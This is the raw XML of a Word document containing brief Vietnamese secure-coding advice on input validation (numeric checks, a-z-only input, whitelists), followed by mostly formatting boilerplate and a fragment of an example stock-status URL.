    <w:p w14:paraId="486E1D08" w14:textId="54AB53E2" w:rsidR="00685AA5" w:rsidRDefault="00685AA5" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Nếu bắt buộc phải gọi ,đầu vào phải được xác thực mạnh mẽ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170D5C5A" w14:textId="50E86ED2" w:rsidR="00685AA5" w:rsidRPr="00685AA5" w:rsidRDefault="00685AA5" w:rsidP="00685AA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00685AA5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Xác thực đầu vào là số.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF05FF4" w14:textId="607527AB" w:rsidR="00685AA5" w:rsidRPr="00685AA5" w:rsidRDefault="00685AA5" w:rsidP="00685AA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00685AA5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Xác thực đầu vào chỉ chứa các kí tự a-z, không có cú pháp hay khoảng trắng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097FB393" w14:textId="034CE0E2" w:rsidR="00685AA5" w:rsidRPr="00685AA5" w:rsidRDefault="00685AA5" w:rsidP="00685AA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00685AA5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Xác thực với những giá trị được phép</w:t>
      </w:r>
      <w:r w:rsidR="004376E7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (whitelist)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00685AA5" w:rsidRPr="00685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DE751D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40EE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538B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="03DC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7490B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C1C8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13"/>
    <w:rsid w:val="00030CF2"/>
    <w:rsid w:val="00087B59"/>
    <w:rsid w:val="001266EA"/>
    <w:rsid w:val="002D7ECB"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00324234"/>
    <w:rsid w:val="004376E7"/>
    <w:rsid w:val="004508DC"/>
    <w:rsid w:val="005F21F1"/>
    <w:rsid w:val="00636825"/>
    <w:rsid w:val="00685AA5"/>
    <w:rsid w:val="006B0231"/>
    <w:rsid w:val="006D4D43"/>
    <w:rsid w:val="00732F1E"/>
    <w:rsid w:val="00842655"/>
    <w:rsid w:val="00931869"/>
    <w:rsid w:val="00946899"/>
    <w:rsid w:val="00981AA9"/>
    <w:rsid w:val="009B3BAC"/>
    <w:rsid w:val="00A47E3F"/>
    <w:rsid w:val="00A554CF"/>
    <w:rsid w:val="00A75F67"/>
    <w:rsid w:val="00B57279"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00D34354"/>
    <w:rsid w:val="00E56059"/>
    <w:rsid w:val="00F41813"/>
    <w:rsid w:val="00F80C4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E3C0CC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C0CA4407-E966-DD4E-A6C5-96758C84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styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E56059"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E56059"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E56059"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009B3BAC"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="004508DC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00946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6148">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="478347973">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="491876866">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="509217608">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="517474406">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="784740036">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1987120439">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1987860466">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20219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secure-website.com/stockStatus?productID=381&amp;storeID=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2022-10-20T00:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-22T03:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>